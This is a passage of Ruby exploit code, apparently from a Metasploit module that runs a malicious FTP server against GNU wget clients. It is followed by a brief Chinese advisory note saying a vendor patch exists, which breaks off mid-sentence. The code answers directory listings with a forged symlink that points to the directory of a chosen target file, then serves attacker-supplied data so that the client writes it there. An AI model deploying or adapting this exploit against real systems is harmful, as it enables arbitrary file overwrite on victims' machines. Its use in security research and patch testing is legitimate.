conn = establish_data_connection(c)
if not conn
c.put("425 Can't build data connection\r\n")
return
end
c.put("150 Opening BINARY mode data connection for #{arg}\r\n")
conn.put(datastore['TARGET_DATA'])
c.put("226 Transfer complete.\r\n")
conn.close
print_good("#{@state[c][:name]} Hopefully wrote #{datastore['TARGET_DATA'].length} bytes to #{datastore['TARGET_FILE']}")
end
def on_client_command_list(c,arg)
print_status("#{@state[c][:name]} -> LIST #{arg}")
if not @state[c][:auth]
c.put "500 Access denied\r\n"
return
end
conn = establish_data_connection(c)
if not conn
c.put("425 Can't build data connection\r\n")
return
end
pwd = @state[c][:cwd]
buf = ''
dstamp = Time.at(Time.now.to_i-((3600*24*365)+(3600*24*(rand(365)+1)))).strftime("%b %e %Y")
unless pwd.index(@fakedir)
buf << "lrwxrwxrwx 1 root root 33 #{dstamp} #{@fakedir} -> #{::File.dirname(datastore['TARGET_FILE'])}\r\n"
buf << "drwxrwxr-x 15 root root 4096 #{dstamp} #{@fakedir}\r\n"
else
buf << "-rwx------ 1 root root #{"%9d" % datastore['TARGET_DATA'].length} #{dstamp} #{::File.basename(datastore['TARGET_FILE'])}\r\n"
end
c.put("150 Opening ASCII mode data connection for /bin/ls\r\n")
conn.put("total #{buf.length}\r\n" + buf)
c.put("226 Transfer complete.\r\n")
conn.close
end
def on_client_command_size(c,arg)
if not @state[c][:auth]
c.put "500 Access denied\r\n"
return
end
c.put("213 #{datastore['TARGET_DATA'].length}\r\n")
end
def on_client_command_cwd(c,arg)
print_status("#{@state[c][:name]} -> CWD #{arg}")
if not @state[c][:auth]
c.put "500 Access denied\r\n"
return
end
upath = "/"
npath = ::File.join(@state[c][:cwd], arg)
bpath = npath[upath.length, npath.length - upath.length]
# Check for traversal above the root directory
if not (npath[0, upath.length] == upath or bpath == '')
bpath = '/'
end
bpath = '/' if bpath == ''
@state[c][:cwd] = bpath
c.put "250 CWD command successful.\r\n"
end
end
建议:
厂商补丁:
GNU
---
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: